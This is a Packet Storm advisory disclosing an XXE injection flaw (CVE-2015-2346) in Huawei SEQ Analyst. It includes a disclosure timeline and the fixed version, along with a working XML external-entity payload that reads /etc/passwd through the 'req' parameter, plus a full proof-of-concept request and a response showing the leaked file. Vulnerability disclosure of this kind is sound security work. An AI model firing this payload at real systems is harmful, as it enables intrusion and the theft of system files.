exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Huawei SEQ Analyst XXE Injection

Huawei SEQ Analyst XXE Injection
Posted Apr 16, 2015
Authored by Ugur Cihan KOC

Huawei SEQ Analyst version V200R002C03LG0001SPC100 suffers from an XML external entity injection vulnerability.

tags | exploit, xxe
advisories | CVE-2015-2346
SHA-256 | c7c2407779c7f1a975e407883855dddb3f3c26e41f43b310f77c4493aaafe71b

Huawei SEQ Analyst XXE Injection

Change Mirror Download
#Document Title:
============
Huawei SEQ Analyst - XML External Entity Injection (XXE)

#Release Date:
===========
15 Apr 2015

#CVE-ID:
=======
CVE-2015-2346

#Product & Service Introduction:
=======================
SEQ Analyst is a platform for business quality monitoring and management by
individual user and multiple vendors in a quasi-realtime and retraceable
manner
More Details & Manual ;
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101

#Vulnerability Disclosure Timeline:
========================
3 Mar 2015 Bug reported to the vendor.
6 Mar 2015 Vendor returned ; investigating
16 Mar 2015 Asked about the case.
16 Mar 2015 Vendor has validated the issue.
17 Mar 2015 There aren't any fix the issue.
18 Mar 2015 CVE number assigned
15 Apr 2015 Fixed

#Affected Product(s):
===============
Huawei Technologies Co. Ltd.
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be
vulnerable)

#Exploitation Technique:
=================
Local, Authenticated

#Technical Details:
========================
Target Path: /monitor/flexdata.action
Sample Payload : <!DOCTYPE foo [<!ENTITY xxe00c70 SYSTEM
"file:///etc/passwd"> ]>
Affected Parameter: req

#Proof of Concept (PoC):
==================
https://drive.google.com/file/d/0B-LWHbwdK3P9YnVvYXFFZWZKc0k/view?usp=sharing

Request:

POST /monitor/flexdata.action HTTP/1.1
Host: ***:8443
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3;
org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US;
locale=en_US; locked=false;
timeNum=1425365144829; timeState=true; loginUserName=testsms;
CASTGC=TGT-549-
skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false
Connection: keep-alive
Referer: https://
***:8443/monitor/flexrelease/AllNetMonitor.swf/[[DYNAMIC]]/5
Content-type: application/x-www-form-urlencoded
Content-Length: 136

req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<c
ommand>bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B020
0%202015

Response:

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 06:46:29 GMT
Server: Apache-Coyote/1.1
Cache- Control: no- cache, no-store
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 4281
<html>
<head>
<style type="text/css">

<tr class="row_even">
<td class="cell_object">1</td>
<td class="cell_object">2〕Command is
bizLicenseSettingnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:Daemon:/sbin:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/false
root:x:0:0:root:/root:/bin/bash
messagebus:x:103:101:User for D-Bus:/var/run/dbus:/bin/false
ntp:x:74:102:NTP daemon:/var/lib/ntp:/bin/false
ftpsecure:x:104:65534:Secure FTP User:/var/lib/empty:/bin/false
polkituser:x:105:103:PolicyKit:/var/run/PolicyKit:/bin/false
haldaemon:x:106:104:User for haldaemon:/var/run/hald:/bin/false
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
webserver:x:360:1800::/home/webserver:/bin/bash
ecmftp:x:1000:1800::/opt/pub/software:/bin/bash
ftptest:x:1001:1800::/opt/webserver/workspaces/ftp:/bin/bash
httpd:x:361:1801::/home/httpd:/bin/bash
cognos:x:1002:1802::/home/cognos:/bin/bash
ftptrace:x:1003:1800::/opt/webserver/workspaces/ftp/traceserver:/bin/bash
ftpsoc:x:1004:1800::/opt/pub/software:/bin/bash
ftprtmu:x:1005:1800::/opt/webserver/workspaces/ftp/rtmu:/bin/bash</td>
</tr>
<tr class="row_odd">
...

#Solution Fix & Patch:
================
15 Apr 2015 Fixed version --> SEQ Analyst V200R002C03LG0001CP0022

#Credits & Authors:
==============
Ugur Cihan Koc
@_uceka_
www.uceka.com


Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close